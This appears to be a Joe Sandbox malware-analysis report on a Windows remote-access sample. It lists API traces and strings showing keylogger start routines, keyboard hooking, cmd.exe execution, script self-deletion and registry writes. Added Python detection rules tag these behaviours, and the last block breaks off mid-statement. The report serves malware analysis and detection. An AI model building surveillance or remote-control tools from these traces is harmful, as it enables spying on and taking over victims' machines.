                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                            • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                            • Opcode ID: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                                                                                                                                                                                                            • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\iGhDjzEiDU.exe,00000104), ref: 00442724
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004427EF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004427F9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe
                                                                                                                                                                                                                                            • API String ID: 2506810119-3688419076
                                                                                                                                                                                                                                            • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                                                                            • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                                                                              • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
                                                                                                                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                                                                            • API String ID: 368326130-2663660666
                                                                                                                                                                                                                                            • Opcode ID: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                                                                                                                                                                                                            • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 258a6fb68fc944e5317241818db4f8e4b5311904cb851d09a550250a4a8b376d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateExecuteExitFileProcessShell
                                                                                                                                                                                                                                            • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                                                                                                                                            • API String ID: 2309964880-3562070623
                                                                                                                                                                                                                                            • Opcode ID: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                                                                                                                                                            • Instruction ID: ace0f40cc0655528612a0b5402a09b3609fe8f046c2334cef27d09c8f481fd79
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D42145315042405AC324FB25E8969BF77E4AFD1318F50453FF482620F2EF38AA49C69A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
• Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
• Opcode Fuzzy Hash: 6c178d591645801289399da5d84ddf8184d34dc30152139e9f78692b17863065
• Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
• Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
• Opcode Fuzzy Hash: 8a51635752a1c61d575209560099017ad37886762b02a6b3bd8adc92d478feb2
• Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
• GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
• __dosmaperr.LIBCMT ref: 0044AB0E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
• Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
• Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
APIs
• GetLocalTime.KERNEL32(?), ref: 00404946
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
• CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040495C
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
• Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
• Opcode Fuzzy Hash: f43da267cab2b2a689ce43856c4360b04c2e21f97e645396d0df9ead70b32fdb
• Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
• Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
• Opcode Fuzzy Hash: 3edb8d7dced932ba54f278ebe09952fcdbe6db201d9c9d38e0d4ca29460b7c95
• Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
  • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
• Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
• Opcode Fuzzy Hash: 40ac6e662a7d765590db31128134f7b1ae0ebe701fd169c5aeeb723224abc78a
• Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
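The entries above (the Offline/Online keylogger start routines, the KeepAlive worker that pairs CreateEventA with CreateThread, the WaitForSingleObject loop with a 0x3E8 timeout) and the wallpaper registry write listed a few lines further down are quicker to triage when the API lines are parsed instead of read by eye. The following is an added example, not Joe Sandbox or Remcos code: a parser for the report's `• Api.MODULE(args), ref: addr` and `• text, xrefs: addr` lines, plus rules that tag the behaviours these entries show. The line grammar is inferred from the report text, the sample input is copied from this report's own entries and labelled as constructed, and the assumption that the printed argument values are positional (so the second WaitForSingleObject argument is the timeout) is mine.

```python
# Parser and behaviour tags for Joe Sandbox per-function API listings.
# Added example (not Joe Sandbox or Remcos code); line grammar inferred from
# the report text, argument values assumed to be listed in parameter order.
import re
from dataclasses import dataclass, field
from typing import List, Optional

# '• [Part of subcall function XXXXXXXX: ]Name.MODULE[(args)], ref: XXXXXXXX'
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Za-z0-9_]+)(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
# '• some string, xrefs: XXXXXXXX[, XXXXXXXX]'
STRING_LINE = re.compile(r"^\s*•\s*(?P<text>.*?), xrefs: [0-9A-Fa-f, ]+$")
# Win32 predefined registry root handles (HKEY_* constants).
REG_ROOTS = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    parent: Optional[str] = None  # set for 'Part of subcall function' lines


@dataclass
class Block:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_block(text: str) -> Block:
    """Parse one function entry; header lines such as 'APIs' or 'Strings' are ignored."""
    block = Block()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = m.group("args")
            block.calls.append(ApiCall(m.group("name"), m.group("module"),
                                       args.split(",") if args else [],
                                       m.group("ref"), m.group("parent")))
        elif (m := STRING_LINE.match(line)):
            block.strings.append(m.group("text"))
    return block


def hex_arg(s: str) -> Optional[int]:
    """8-digit hex argument as the report prints it, or None for '?' (unknown)."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", s) else None


def assess(block: Block) -> List[str]:
    """Tag the Remcos behaviours visible in one entry's API/string combination."""
    names = {c.name for c in block.calls}
    texts = [a for c in block.calls for a in c.args] + block.strings
    tags = []
    # Remcos formats 'Offline/Online Keylogger Started' just before spawning capture threads.
    for t in texts:
        m = re.search(r"(Offline|Online) Keylogger Started", t)
        if m and "CreateThread" in names:
            tags.append("keylogger-start:" + m.group(1).lower())
            break
    if any(t.startswith("KeepAlive") for t in texts) and names & {"CreateEventA", "CreateEventW"} \
            and "CreateThread" in names:
        tags.append("keepalive-worker")
    for c in block.calls:  # 2nd WaitForSingleObject argument = timeout in ms (0x3E8 -> 1000)
        if c.name == "WaitForSingleObject" and len(c.args) > 1 and hex_arg(c.args[1]) is not None:
            tags.append(f"wait-timeout-ms:{hex_arg(c.args[1])}")
    if names & {"RegSetValueExA", "RegSetValueExW"} and "Control Panel\\Desktop" in texts:
        root = "?"
        for c in block.calls:
            if c.name.startswith(("RegCreateKey", "RegOpenKey")) and c.args:
                root = REG_ROOTS.get(c.args[0].upper(), root)
        tags.append("wallpaper-registry-write:" + root)
    return tags


# Constructed sample: API/string lines copied from this report's entries.
SAMPLE = {
    "keylogger_offline":
        "• Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884\n"
        "• Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905\n"
        "• CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691\n",
    "keepalive_setup":
        "• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994\n"
        "• CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7\n"
        "• KeepAlive | Enabled | Timeout: , xrefs: 0040495C\n",
    "keepalive_wait":
        "• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40\n"
        "• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7\n",
    "wallpaper":
        "• RegCreateKeyA.ADVAPI32(80000001,Control Panel\\Desktop,004655B0), ref: 004126E1\n"
        "• RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\\Desktop,?,?,"
        "0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709\n",
}


def scan(samples=SAMPLE):
    """Return {entry name: behaviour tags} for every entry."""
    return {name: assess(parse_block(text)) for name, text in samples.items()}


if __name__ == "__main__":
    for name, tags in scan().items():
        print(f"{name:18s} {tags}")
```

The rules deliberately require an API plus a string (for example CreateThread together with "Keylogger Started") rather than a string alone, so that a CRT entry such as the `bad locale name` one above yields no tag; `?` arguments are treated as unknown and never decoded.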
APIs
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
• RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
• RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Control Panel\Desktop
• API String ID: 1818849710-27424756
• Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
• Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
• Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                                                                                                            • String ID: TUF
                                                                                                                                                                                                                                            • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                                            • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                            • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExecuteShell
                                                                                                                                                                                                                                            • String ID: /C $cmd.exe$open
                                                                                                                                                                                                                                            • API String ID: 587946157-3896048727
                                                                                                                                                                                                                                            • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                                                                            • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: TerminateThread$HookUnhookWindows
                                                                                                                                                                                                                                            • String ID: pth_unenc
                                                                                                                                                                                                                                            • API String ID: 3123878439-4028850238
                                                                                                                                                                                                                                            • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                            • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                            • String ID: GetCursorInfo$User32.dll
                                                                                                                                                                                                                                            • API String ID: 1646373207-2714051624
                                                                                                                                                                                                                                            • Opcode ID: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                                                                                                                                            • Instruction ID: 8a619761425f66876362e8ef81435da0b65ff7d8438f08abde0d1abd95200d6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc8bea9838cb233a2310acf876650f342beeb4ce5054a53d2b393f5eabca9cdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAB092B458A3059BC7206BE0BD0EA083B64E644703B1000B2F087C1261EB788080DA6E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                            • String ID: GetLastInputInfo$User32.dll
                                                                                                                                                                                                                                            • API String ID: 2574300362-1519888992
                                                                                                                                                                                                                                            • Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                                                                                                                                            • Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F
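The "APIs" lines of the entries above carry most of the triage value in this part of the listing: the RegSetValueExA write under Control Panel\Desktop (WallpaperStyle), the RegCreateKeyA of a "TUF" key whose first argument 80000001 is the predefined HKEY_CURRENT_USER handle, ShellExecuteW of cmd.exe with "/C ", the TerminateThread / UnhookWindowsHookEx teardown of the hook thread, and the GetProcAddress resolution of GetCursorInfo and GetLastInputInfo from User32.dll. The Python below is added here as an example and is not Joe Sandbox code or part of the report: it parses lines of the "• Api.MODULE(args), ref: ADDR" form and tags the behaviour each one implies. The sample lines are copied from the entries above; the tag names and the rule set are the editor's own heuristics, not sandbox signatures.

```python
"""Triage helper for the 'APIs' lines of a Joe Sandbox function listing.

Added example (not Joe Sandbox code): parses lines of the form
    • Api.MODULE(arg,arg,...), ref: ADDRESS
and tags the behaviours they imply. SAMPLE is copied from the report entries;
the tag names and rules are the editor's own heuristics, not sandbox signatures.
"""
import re
from dataclasses import dataclass

# Sample input, copied from this report's function entries, plus one non-API
# line ("Source File") to show that the parser ignores it.
SAMPLE = r"""
• RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
• UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
• TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
"""

API_LINE = re.compile(
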